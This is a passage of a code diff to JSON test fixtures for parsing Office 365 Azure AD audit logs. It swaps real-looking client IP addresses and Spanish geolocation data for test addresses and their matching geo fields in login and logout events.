"175.16.199.1", "tags": [ "forwarded" ], 
@@ -3717,8 +3655,8 @@ }, { "@timestamp": "2020-02-11T16:51:23.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3736,7 +3674,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 53782, + "log.offset": 53710, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3753,10 +3691,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:51:23", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -3785,20 +3723,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -3816,8 +3752,8 @@ }, { "@timestamp": "2020-02-12T21:39:45.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3834,7 +3770,7 @@ "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", - "log.offset": 55232, + "log.offset": 55158, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -3843,10 +3779,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:39:45", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", @@ -3874,19 +3810,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -3901,8 +3836,8 @@ }, { "@timestamp": "2020-02-12T21:40:16.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -3920,7 +3855,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 56341, + "log.offset": 56267, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3937,10 +3872,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:40:16", "o365.audit.ExtendedProperties.FlowTokenScenario": "Login", "o365.audit.ExtendedProperties.RequestType": "Login:login", @@ -3970,20 +3905,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -4001,8 +3935,8 @@ }, { "@timestamp": "2020-02-08T14:33:52.000Z", - "client.address": "37.29.234.179", - "client.ip": "37.29.234.179", + "client.address": "67.43.156.12", + "client.ip": "67.43.156.12", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4020,7 +3954,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 57849, + "log.offset": 57775, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4037,10 +3971,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "37.29.234.179", + "o365.audit.ActorIpAddress": "67.43.156.12", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "37.29.234.179", + "o365.audit.ClientIP": "67.43.156.12", "o365.audit.CreationTime": "2020-02-08T14:33:52", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4069,17 +4003,16 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "37.29.234.179", + "related.ip": "67.43.156.12", "related.user": "asr", "service.type": "o365", - "source.as.number": 16299, - "source.as.organization.name": "XFERA Moviles S.A.", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.4172, - "source.geo.location.lon": -3.684, - "source.ip": "37.29.234.179", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "forwarded" ], 
@@ -4097,8 +4030,8 @@ }, { "@timestamp": "2020-02-12T10:53:24.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4116,7 +4049,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 59299, + "log.offset": 59223, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4133,10 +4066,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T10:53:24", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -4165,20 +4098,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -4196,8 +4128,8 @@ }, { "@timestamp": "2020-02-07T16:43:22.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4215,7 +4147,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 60750, + "log.offset": 60674, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -4232,10 +4164,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:43:22", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4264,20 +4196,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -4295,8 +4225,8 @@ }, { "@timestamp": "2020-02-06T09:28:04.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -4313,7 +4243,7 @@ "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", - "log.offset": 62199, + "log.offset": 62119, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4322,10 +4252,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-06T09:28:04", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout", "o365.audit.ExtendedProperties.ResultStatusDetail": "Success", @@ -4353,19 +4283,17 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -4380,8 +4308,8 @@ }, { "@timestamp": "2020-02-12T21:38:35.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4399,7 +4327,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 63308, + "log.offset": 63226, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4416,10 +4344,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:38:35", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -4448,20 +4376,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], @@ -4479,8 +4406,8 @@ }, { "@timestamp": "2020-02-10T15:13:36.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4498,7 +4425,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 64758, + "log.offset": 64676, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -4515,10 +4442,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:36", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4547,20 +4474,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -4578,8 +4503,8 @@ }, { "@timestamp": "2020-02-12T10:51:49.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -4597,7 +4522,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 66208, + "log.offset": 66124, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4614,10 +4539,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T10:51:49", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4646,20 +4571,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -4677,8 +4601,8 @@ }, { "@timestamp": "2020-02-07T16:43:37.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4696,7 +4620,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 67601, + "log.offset": 67517, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4713,10 +4637,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:43:37", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -4745,20 +4669,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -4776,8 +4698,8 @@ }, { "@timestamp": "2020-02-10T15:13:36.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4795,7 +4717,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 69051, + "log.offset": 68963, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -4812,10 +4734,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-10T15:13:36", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4844,20 +4766,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -4875,8 +4795,8 @@ }, { "@timestamp": "2020-02-12T21:38:37.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -4894,7 +4814,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 70444, + "log.offset": 70354, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -4911,10 +4831,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "79.159.10.151", + "o365.audit.ActorIpAddress": "216.160.83.57", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.10.151", + "o365.audit.ClientIP": "216.160.83.57", "o365.audit.CreationTime": "2020-02-12T21:38:37", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -4943,20 +4863,19 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "forwarded" ], 
@@ -4974,8 +4893,8 @@ }, { "@timestamp": "2020-02-06T09:28:00.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -4993,7 +4912,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 71895, + "log.offset": 71805, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -5010,10 +4929,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-06T09:28:00", "o365.audit.ExtendedProperties.KeepMeSignedIn": "False", "o365.audit.ExtendedProperties.RequestType": 